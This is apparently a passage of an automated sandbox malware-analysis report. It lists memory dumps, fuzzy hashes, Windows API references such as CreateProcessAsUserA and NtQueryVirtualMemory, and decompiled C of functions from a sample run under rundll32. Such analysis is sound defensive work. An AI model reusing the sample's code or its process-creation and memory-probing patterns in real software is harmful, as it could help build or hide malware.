                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: fa325bdafb3c154772591fba5ceccab0c0e74e448f976aa4e7506c66901bd3b1
                                                          • Instruction ID: 3ca8e98d900b305641cc2184660c30c92b31d7c029c1bc7777569b754f5fa0ae
                                                          • Opcode Fuzzy Hash: fa325bdafb3c154772591fba5ceccab0c0e74e448f976aa4e7506c66901bd3b1
                                                          • Instruction Fuzzy Hash: 4122847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05593570, Relevance: 1.8, Strings: 1, Instructions: 583COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 68f28effd9e2d5b56ceb96e6f5b78ecafee3ce2e99518e13e48cbe7c1065c252
                                                          • Instruction ID: 5b7a32432a018745f404fb7ed3865bb9a0c7cc2ea1adc3975fa0ebb99a95740c
                                                          • Opcode Fuzzy Hash: 68f28effd9e2d5b56ceb96e6f5b78ecafee3ce2e99518e13e48cbe7c1065c252
                                                          • Instruction Fuzzy Hash: 6C428B74A04B46CFCB29CF69C490ABABBF2FF49304F14896DC48B97651E738A585CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055843B9, Relevance: 1.8, APIs: 1, Instructions: 556COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(?,?,00000000,000000FE,?,?,00000000), ref: 05584777
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID:
                                                          • API String ID: 3510742995-0
                                                          • Opcode ID: ac1e0b75224bfff75b51d28beab584eabc0336db60f942c72381f0595546712a
                                                          • Instruction ID: c0b861ad988b9399404c8218c83218477c5b569bbcc156b49d391c79e63678e1
                                                          • Opcode Fuzzy Hash: ac1e0b75224bfff75b51d28beab584eabc0336db60f942c72381f0595546712a
                                                          • Instruction Fuzzy Hash: F0324770A04615EFDF19DF58C480ABDBBB2FF84315F15819ADC56AB285EB70DA41CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E58055, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E58055(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xe5a330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xe5a378 = 1;
										__eflags =  *0xe5a378;
										if( *0xe5a378 != 0) {
											goto L60;
										}
										_t84 =  *0xe5a330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xe5a378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xe5a330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xe5a338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xe5a334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xe5a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xe5a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xe5a378 = 1;
							__eflags =  *0xe5a378;
							if( *0xe5a378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xe5a338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xe5a338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xe5a378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xe5a338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xe5a330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xe5a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xe5a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                          0x00e5805f
                                                          0x00e58062
                                                          0x00e58068
                                                          0x00e58086
                                                          0x00000000
                                                          0x00e58086
                                                          0x00e58070
                                                          0x00e58079
                                                          0x00e5807f
                                                          0x00e5808e
                                                          0x00e58091
                                                          0x00e58094
                                                          0x00e5809e
                                                          0x00e5809e
                                                          0x00e580a0
                                                          0x00e580a3
                                                          0x00e580a5
                                                          0x00e580a5
                                                          0x00e580a7
                                                          0x00e580aa
                                                          0x00000000
                                                          0x00000000
                                                          0x00e580ac
                                                          0x00e580ae
                                                          0x00e58114
                                                          0x00e58114
                                                          0x00e58272
                                                          0x00000000
                                                          0x00e58272
                                                          0x00e580b0
                                                          0x00e580b0
                                                          0x00e580b4
                                                          0x00e580b6
                                                          0x00e580b6
                                                          0x00e580b6
                                                          0x00e580b6
                                                          0x00e580b9
                                                          0x00e580ba
                                                          0x00e580bd
                                                          0x00e580bd
                                                          0x00e580c1
                                                          0x00e580c5
                                                          0x00e580d3
                                                          0x00e580d3
                                                          0x00e580db
                                                          0x00e580e1
                                                          0x00e580e3
                                                          0x00e580e5
                                                          0x00e580f5
                                                          0x00e58102
                                                          0x00e58106
                                                          0x00e5810b
                                                          0x00e5810d
                                                          0x00e5818b
                                                          0x00e5818b
                                                          0x00e5810f
                                                          0x00e5810f
                                                          0x00e5810f
                                                          0x00e5818d
                                                          0x00e5818f
                                                          0x00e58270
                                                          0x00e58270
                                                          0x00000000
                                                          0x00e58195
                                                          0x00e58195
                                                          0x00e5819c
                                                          0x00000000
                                                          0x00000000
                                                          0x00e581a2
                                                          0x00e581a6
                                                          0x00e58202
                                                          0x00e58204
                                                          0x00e5820c
                                                          0x00e5820e
                                                          0x00e58210
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58212
                                                          0x00e58218
                                                          0x00e5821a
                                                          0x00e5821c
                                                          0x00e58231
                                                          0x00e58231
                                                          0x00e58233
                                                          0x00e58262
                                                          0x00e58269
                                                          0x00000000
                                                          0x00e58269
                                                          0x00e58237
                                                          0x00e58238
                                                          0x00e5823a
                                                          0x00e5823c
                                                          0x00e5823c
                                                          0x00e5823e
                                                          0x00e58240
                                                          0x00e58242
                                                          0x00e58256
                                                          0x00e58256
                                                          0x00e58259
                                                          0x00e5825b
                                                          0x00e5825b
                                                          0x00e5825c
                                                          0x00e5825c
                                                          0x00000000
                                                          0x00e58244
                                                          0x00e58244
                                                          0x00e58244
                                                          0x00e5824d
                                                          0x00e5824e
                                                          0x00e58250
                                                          0x00e58252
                                                          0x00e58252
                                                          0x00000000
                                                          0x00e58244
                                                          0x00e58242
                                                          0x00e5821e
                                                          0x00e58225
                                                          0x00e58225
                                                          0x00e58227
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58229
                                                          0x00e5822a
                                                          0x00e5822d
                                                          0x00e5822f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e5822f
                                                          0x00000000
                                                          0x00e58225
                                                          0x00e581a8
                                                          0x00e581ab
                                                          0x00e581b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00e581b9
                                                          0x00e581bb
                                                          0x00e581c1
                                                          0x00000000
                                                          0x00000000
                                                          0x00e581c7
                                                          0x00e581cd
                                                          0x00000000
                                                          0x00000000
                                                          0x00e581d3
                                                          0x00e581d5
                                                          0x00e581de
                                                          0x00e581e2
                                                          0x00000000
                                                          0x00000000
                                                          0x00e581e8
                                                          0x00e581eb
                                                          0x00e581ed
                                                          0x00000000
                                                          0x00000000
                                                          0x00e581f4
                                                          0x00e581f6
                                                          0x00000000
                                                          0x00000000
                                                          0x00e581f8
                                                          0x00e581fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e581fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e580e7
                                                          0x00e580e7
                                                          0x00e580e7
                                                          0x00e580ee
                                                          0x00000000
                                                          0x00000000
                                                          0x00e580f0
                                                          0x00e580f1
                                                          0x00e580f3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e580f3
                                                          0x00e5811b
                                                          0x00e5811d
                                                          0x00000000
                                                          0x00000000
                                                          0x00e5812d
                                                          0x00e5812f
                                                          0x00e58131
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58137
                                                          0x00e5813e
                                                          0x00e5816a
                                                          0x00e5816a
                                                          0x00e5816c
                                                          0x00e5816e
                                                          0x00e58182
                                                          0x00e58184
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58170
                                                          0x00e58170
                                                          0x00e58170
                                                          0x00e58179
                                                          0x00e5817a
                                                          0x00e5817c
                                                          0x00e5817e
                                                          0x00e5817e
                                                          0x00000000
                                                          0x00e58170
                                                          0x00e58140
                                                          0x00e58140
                                                          0x00e58143
                                                          0x00e58145
                                                          0x00e58157
                                                          0x00e58157
                                                          0x00e5815a
                                                          0x00e5815c
                                                          0x00e5815c
                                                          0x00e5815d
                                                          0x00e5815d
                                                          0x00e58163
                                                          0x00e58163
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58147
                                                          0x00e58147
                                                          0x00e58147
                                                          0x00e5814e
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58150
                                                          0x00e58150
                                                          0x00e58151
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58151
                                                          0x00e58153
                                                          0x00e58155
                                                          0x00e58168
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58168
                                                          0x00000000
                                                          0x00e58155
                                                          0x00e580c7
                                                          0x00e580ca
                                                          0x00e580cd
                                                          0x00000000
                                                          0x00000000
                                                          0x00e580cf
                                                          0x00e580d1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e580d1
                                                          0x00e58096
                                                          0x00e58098
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00E58106
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: MemoryQueryVirtual
                                                          • String ID:
                                                          • API String ID: 2850889275-0
                                                          • Opcode ID: 2a3c63ad64298020ad65f5d0142a7a2e6161dcfaa89c2163f5205df75c2c4255
                                                          • Instruction ID: 92720c07b078492fe65f0679fea6bc88685210243bb28cd33c89b2d8af8eb43b
                                                          • Opcode Fuzzy Hash: 2a3c63ad64298020ad65f5d0142a7a2e6161dcfaa89c2163f5205df75c2c4255
                                                          • Instruction Fuzzy Hash: 5461C134601A018FDB19CA29CB8066937A1EB8575AF28AD79DC51F71A4EF31DC4ECB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557423D, Relevance: 1.6, Strings: 1, Instructions: 343COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: d0a0e0cde52bd109f763a167a65e7fb4e3902e3ac975bba4493eea9d592311f4
                                                          • Instruction ID: 7ee7f12e808f3e0065af198118d5e0aaaafcefad1f3bc9af085e434ba8f095be
                                                          • Opcode Fuzzy Hash: d0a0e0cde52bd109f763a167a65e7fb4e3902e3ac975bba4493eea9d592311f4
                                                          • Instruction Fuzzy Hash: 5FD18E30A0425EDFCF18CFA8E4905BEBBB2FF85314F24856DD85697240E7709A55CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557E6B4, Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0557E6EE
                                                            • Part of subcall function 0557CC84: ResumeThread.KERNEL32(00000004,?,0557CD20,?), ref: 0557CC99
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateProcessResumeThreadUser
                                                          • String ID:
                                                          • API String ID: 3393100766-0
                                                          • Opcode ID: 82f22ed160320ce1ca2291d60a4478fdf13bb5541afd26eec8e2b8cec86bb3a2
                                                          • Instruction ID: 412e309372cdb6f769215d8e18df812a5170e2101e910f2edacdc7de2fea6c15
                                                          • Opcode Fuzzy Hash: 82f22ed160320ce1ca2291d60a4478fdf13bb5541afd26eec8e2b8cec86bb3a2
                                                          • Instruction Fuzzy Hash: 54F0FF32215149AF9F024E99EC41CDA7FAAFF49374B054225F91992120C736DC25AB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05579D36, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05579D4E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorStatus
                                                          • String ID:
                                                          • API String ID: 1596131371-0
                                                          • Opcode ID: 45b89ec5bb0bd95d821676aa4fb23ed622d10b9620911b2c702a82ed1824f23a
                                                          • Instruction ID: 86004b1b2845df20dd34726f0a03b9d3bbf4f973f775d8b2ac5b5cf09be6365a
                                                          • Opcode Fuzzy Hash: 45b89ec5bb0bd95d821676aa4fb23ed622d10b9620911b2c702a82ed1824f23a
                                                          • Instruction Fuzzy Hash: 08C012316082016FEF185B50E81EE3A7F25FB50740F01441DB14984070DF789858D711
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05584B1F, Relevance: .7, Instructions: 669COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 963d91cf9419add5775c214a8614ac0b13b9a4e7845549bd75c310309692ba8e
                                                          • Instruction ID: 06486eda51dd8ed1d71101705771b572a7386228bf7552f34e160a7fc15cc4d7
                                                          • Opcode Fuzzy Hash: 963d91cf9419add5775c214a8614ac0b13b9a4e7845549bd75c310309692ba8e
                                                          • Instruction Fuzzy Hash: 4A424971E14219EBCF18DF98C5906BCBBF2FF84305F14819AD852AB285E7749A40DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05587B5D, Relevance: .4, Instructions: 386COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                                                          • Instruction ID: aaf863e51f8e983af449b5927bc3f8a1e9789891800f36d7c901ae75caf5c79d
                                                          • Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                                                          • Instruction Fuzzy Hash: B2F15530A18649EBCB0CCFA9D0A08BDBBB2FF89314B24C19EE49667745CB355A45CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055710E6, Relevance: .3, Instructions: 298COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID:
                                                          • API String ID: 3510742995-0
                                                          • Opcode ID: 170b8e373d3bb8607a78ccf5335a13f551790139923378a44a186d34c58fe2e1
                                                          • Instruction ID: 39df62a4dee65e4f26d90c086b3572506db680d4ed4ddc5f754c8891bf632524
                                                          • Opcode Fuzzy Hash: 170b8e373d3bb8607a78ccf5335a13f551790139923378a44a186d34c58fe2e1
                                                          • Instruction Fuzzy Hash: 75C1FE35604B498FD725DF29D8809A6B3E2FF88304B54492ED9D78BB61D735F846CB04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055952A0, Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                          • Instruction ID: f46a9978c45aedc31efeb41548280b1539bf44730860d45bd8f843ed05ddc486
                                                          • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                          • Instruction Fuzzy Hash: AC21F8729002049FCF19EF68D8C49BBB7A5FF84310B098168DD5A8B245E734F925CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E57E30, Relevance: .1, Instructions: 77COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 71%
                                                          			E00E57E30(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00E57F9B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00E58055(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00E57F40(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00E57F9B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00E58037(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                          0x00e57e34
                                                          0x00e57e35
                                                          0x00e57e36
                                                          0x00e57e39
                                                          0x00e57e3b
                                                          0x00e57e3e
                                                          0x00e57e3f
                                                          0x00e57e41
                                                          0x00e57e42
                                                          0x00e57e43
                                                          0x00e57e46
                                                          0x00e57e50
                                                          0x00e57f01
                                                          0x00e57f08
                                                          0x00e57f11
                                                          0x00e57e56
                                                          0x00e57e56
                                                          0x00e57e5c
                                                          0x00e57e62
                                                          0x00e57e65
                                                          0x00e57e68
                                                          0x00e57e6c
                                                          0x00e57e71
                                                          0x00e57e76
                                                          0x00e57ef6
                                                          0x00000000
                                                          0x00e57e78
                                                          0x00e57e78
                                                          0x00e57e84
                                                          0x00e57e86
                                                          0x00e57ee1
                                                          0x00e57ee1
                                                          0x00e57ee7
                                                          0x00000000
                                                          0x00e57e88
                                                          0x00e57e97
                                                          0x00e57e99
                                                          0x00e57e9a
                                                          0x00e57e9b
                                                          0x00e57e9e
                                                          0x00e57e9e
                                                          0x00e57ea0
                                                          0x00000000
                                                          0x00e57ea2
                                                          0x00e57ea2
                                                          0x00e57eec
                                                          0x00e57ea4
                                                          0x00e57ea4
                                                          0x00e57ea8
                                                          0x00e57eb0
                                                          0x00e57eb5
                                                          0x00e57eba
                                                          0x00e57ec6
                                                          0x00e57ece
                                                          0x00e57ed5
                                                          0x00e57edb
                                                          0x00e57edf
                                                          0x00000000
                                                          0x00e57edf
                                                          0x00e57ea2
                                                          0x00e57ea0
                                                          0x00000000
                                                          0x00e57e86
                                                          0x00e57efa
                                                          0x00e57efa
                                                          0x00e57efa
                                                          0x00e57e76
                                                          0x00e57f16
                                                          0x00e57f1d

                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction ID: c5321192d4fb17e75018ab526eaf324f1085af09e51171a8465e80e4f82c9e0f
                                                          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
